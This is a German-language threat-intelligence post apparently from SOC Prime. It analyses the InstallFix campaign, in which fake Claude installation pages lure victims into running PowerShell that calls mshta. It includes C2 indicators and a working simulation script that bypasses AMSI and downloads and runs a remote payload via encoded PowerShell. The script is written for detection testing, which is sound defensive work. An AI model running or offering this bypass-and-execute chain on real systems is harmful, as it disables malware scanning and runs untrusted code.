SOC Prime Bias: Mittel

07 Mai 2026 18:38
newspaper icon Trend Micro

InstallFix und Claude-Code: Wie gefälschte Installationsseiten zu echtem Schaden führen

Author Photo
Ruslan Mikhalov Leiter der Bedrohungsforschung bei SOC Prime linkedin icon Folgen
InstallFix und Claude-Code: Wie gefälschte Installationsseiten zu echtem Schaden führen
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Die InstallFix-Kampagne verbreitet Malware durch bösartige Google-Anzeigen, die Claude AI-Installationsseiten imitieren. Opfer werden dazu überredet, PowerShell-Befehle auszuführen, die mshta.exe aufrufen, um eine Polyglot-ZIP- und HTA-Datei abzurufen, die dann eine mehrstufige, dateilose Infektionskette startet. Die Nutzlast deaktiviert die SSL-Validierung und AMSI-Schutzmechanismen, lädt zusätzlichen Code von einer opferspezifischen Command-and-Control-Domain herunter und schafft Persistenz durch geplante Aufgaben. Die Operation hat Organisationen in verschiedenen Branchen und Regionen weltweit ins Visier genommen.

Untersuchung

Forscher verfolgten den gesamten Ausführungsfluss von der gefälschten Installationsseite über mshta.exe, VBScript und mehrere Schichten kodierter PowerShell. Das Deobfuskieren zeigte, dass die Malware eine eindeutige Kennung für jedes Opfer generierte und diese nutzte, um eine hostspezifische Command-and-Control-URL zu erstellen. Netzwerktelemetrie enthüllte ausgehende Kommunikation mit mehreren bösartigen Domains und IP-Adressen. Obwohl die endgültige Nutzlast nicht vollständig wiederhergestellt werden konnte, deutete das beobachtete Verhalten auf Aktivitäten zur Datenverarbeitung und Datenexfiltration hin.

Abschwächung

Verteidiger sollten den Zugriff auf die identifizierten bösartigen Domains und IP-Adressen blockieren und den Einsatz von mshta.exe und anderen veralteten Skripting-Tools wann immer möglich einschränken. Endpunktsicherheitseinstellungen sollten so angepasst werden, dass AMSI-Umgehungsversuche und SSL-Validierungsmanipulationen erkannt werden. Organisationen sollten auch strikte URL-Filterung für Google Ads-Traffic, der zu Software-Installationsseiten führt, durchsetzen. Benutzerbewusstsein bleibt entscheidend, insbesondere im Hinblick auf das Risiko, Befehle aus gesponserten Suchergebnissen oder von nicht verifizierten Quellen auszuführen.

Reaktion

Sicherheitsteams sollten bei Prozessketten Alarm schlagen, in denen mshta.exe startet cmd.exe, powershell.exe, oder Skriptinterpreter mit verdächtigen Remote-URLs. Diese Ereignisse sollten mit der Erstellung geplanter Aufgaben und ausgehenden Verbindungen zur bekannten Command-and-Control-Infrastruktur korreliert werden. Wenn Aktivität bestätigt wird, sollten Verteidiger den Host isolieren, die bösartigen Prozesse beenden und alle Persistenzmechanismen wie geplante Aufgaben entfernen. Danach sollte eine forensische Überprüfung durchgeführt werden, um verbleibende dateilose Nutzlastkomponenten zu identifizieren.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef process fill:#ffcc99 classDef malware fill:#ff9999 %% Nodes – Aktionen recon_google_ads["<b>Aktion</b> – <b>T1593.002 Offen zugängliche Webseiten/Domains durchsuchen: Suchmaschinen</b><br/><b>Beschreibung</b>: Angreifer platziert bösartige gesponserte Ergebnisse auf Google, um Opfer anzulocken, die nach Claude AI suchen."] class recon_google_ads action initial_access_phishing["<b>Aktion</b> – <b>T1566.002 Phishing: Spearphishing-Link</b><br/><b>Beschreibung</b>: Opfer klickt auf eine bösartige Anzeige und wird zu einer gefälschten Claude-Installationsseite umgeleitet, die einen PowerShell-Befehl enthält."] class initial_access_phishing action user_exec_copy_paste["<b>Aktion</b> – <b>T1204.004 Benutzerausführung: Bösartiges Kopieren und Einfügen</b><br/><b>Beschreibung</b>: Opfer kopiert den angezeigten PowerShell-Befehl und führt ihn in einer Konsole aus."] class user_exec_copy_paste action execution_mshta["<b>Aktion</b> – <b>T1218.005 Systembinär-Proxy-Ausführung: Mshta</b><br/><b>Beschreibung</b>: PowerShell ruft mshta.exe mit einer URL zu einem Polyglot-HTA/MSIX-Bundle auf."] class execution_mshta action execution_htavbscript["<b>Aktion</b> – <b>T1027 Verschleierte Dateien oder Informationen</b><br/><b>Beschreibung</b>: Das HTA-VBScript wird über mshta ausgeführt, nutzt das Shell.Application-COM-Objekt, um cmd.exe zu starten."] class execution_htavbscript action execution_powershell_stager["<b>Aktion</b> – <b>T1140 Dateien oder Informationen entobfuskieren/entschlüsseln</b><br/><b>Beschreibung</b>: PowerShell-Stager ist base64-codiert, in Variablen aufgeteilt und wird mit dem Schlüssel "AMSI_RESULT_NOT_DETECTED" XOR-dekodiert."] class execution_powershell_stager action defense_evasion_amsi["<b>Aktion</b> – <b>T1211 Ausnutzung zur Abwehrumgehung</b><br/><b>Beschreibung</b>: Das Skript deaktiviert die SSL-Zertifikatüberprüfung und patcht AMSI, um die Erkennung zu umgehen"] class defense_evasion_amsi action persistence_scheduled_task["<b>Aktion</b> – <b>T1053 Geplante Aufgabe/Job</b><br/><b>Beschreibung</b>: Die Malware erstellt eine geplante Aufgabe, um die Nutzlast nach einem Systemneustart erneut zu starten."] class persistence_scheduled_task action collection_automated["<b>Aktion</b> – <b>T1119 Automatisierte Sammlung</b><br/><b>Beschreibung</b>: Sammelt Eu-Wallet-Anwendungsdaten und Browserdaten vom kompromittierten Host."] class collection_automated action exfiltration_automated["<b>Aktion</b> – <b>T1020 Automatische Exfiltration</b> & <b>T1029 Geplanter Transfer</b><br/><b>Beschreibung</b>: Gesammelte Daten werden an von Angreifern kontrollierte Domains wie https://oakenfjrod.ru und IPs 104.21.0.95, 185.177.239.255 gesendet."] class exfiltration_automated action %% Nodes – Tools / Prozesse tool_mshta["<b>Tool</b> – <b>Name</b>: mshta.exe<br/><b>Zweck</b>: Führt HTML-Anwendungsdateien aus."] class tool_mshta tool tool_cmd["<b>Tool</b> – <b>Name</b>: cmd.exe<br/><b>Zweck</b>: Windows-Befehlszeilen-Interpreter."] class tool_cmd tool tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Zweck</b>: Skript-Engine zur Nutzlastbereitstellung und Entschlüsselung."] class tool_powershell tool tool_amsi_patch["<b>Tool</b> – <b>Name</b>: AMSI-Patch<br/><b>Zweck</b>: Ändert die Antimalware-Scan-Schnittstelle, um die Erkennung zu unterdrücken."] class tool_amsi_patch tool tool_schtasks["<b>Tool</b> – <b>Name</b>: schtasks.exe<br/><b>Zweck</b>: Erstellt und verwaltet geplante Aufgaben."] class tool_schtasks tool %% Verbindungen – Fluss recon_google_ads –>|führt zu| initial_access_phishing initial_access_phishing –>|führt zu| user_exec_copy_paste user_exec_copy_paste –>|führt aus| tool_powershell tool_powershell –>|ruft auf| execution_mshta execution_mshta –>|verwendet| tool_mshta execution_mshta –>|lädt herunter| execution_htavbscript execution_htavbscript –>|erzeugt| tool_cmd tool_cmd –>|führt aus| execution_powershell_stager execution_powershell_stager –>|verwendet| tool_powershell execution_powershell_stager –>|wendet an| defense_evasion_amsi defense_evasion_amsi –>|verwendet| tool_amsi_patch defense_evasion_amsi –>|erstellt| persistence_scheduled_task persistence_scheduled_task –>|verwendet| tool_schtasks persistence_scheduled_task –>|ermöglicht| collection_automated collection_automated –>|löst aus| exfiltration_automated "

Angriffsabfluss

Simulation Ausführung

Voraussetzung: Die Telemetrie- und Basislinien-Pre-Flight-Überprüfung muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und zielen darauf ab, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle:
    Der Angreifer erhält ein bösartiges PowerShell-Skript über einen Spearphishing-Link (T1566.002), das eine Nutzlast von einem kompromittierten Server herunterlädt. Um AMSI-Erkennung zu vermeiden, injiziert das Skript die Zeichenkette AMSI_RESULT_NOT_DETECTED in den Prozesspeicher, dann wird der IEX Operator verwendet, um den heruntergeladenen Code auszuführen. Der gesamte Befehl ist in Base64-codiert und wird mit dem -EncodedCommand Flagge gestartet, was alle drei Selektor-Strings in der Sigma-Regel erfüllt.

    Schritt für Schritt:

    1. Laden Sie die bösartige Nutzlast herunter (ein einfacher PowerShell-Einzeiler, der eine Datei schreibt).
    2. Injizieren Sie den AMSI-Bypass-Marker durch Setzen des privaten statischen Feldes amsiInitFailed.
    3. Führen Sie die Nutzlast aus via IEX.
    4. Starten Sie die gesamte Kette mit powershell.exe -EncodedCommand ….

  • Regressionstest-Skript:

    # InstallFix-artige PowerShell-Angriffssimulation
# -------------------------------------------------
# 1. Definieren Sie den bösartigen Einzeiler
$malicious = @"
`$bypass = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
            .GetField('amsiInitFailed','NonPublic,Static')
`$bypass.SetValue(`$null,$true)
IEX (New-Object Net.WebClient).DownloadString('http://example.com/payload.ps1')
"@

# 2. Codieren Sie das Skript in UTF-16LE und dann in Base64 (erforderlich von PowerShell)
$bytes = [System.Text.Encoding]::Unicode.GetBytes($malicious)
$encoded = [Convert]::ToBase64String($bytes)

# 3. Ausführen über powershell.exe mit der Option -EncodedCommand
$command = "powershell.exe -NoProfile -EncodedCommand $encoded"
Write-Host "Starte bösartige PowerShell..."
Invoke-Expression $command

  • Cleanup Commands:

    # Entfernen Sie alle temporären Dateien und beenden Sie verbleibende Prozesse
Get-Process -Name powershell -ErrorAction SilentlyContinue | Stop-Process -Force
Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue
Write-Host "Bereinigung abgeschlossen."

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten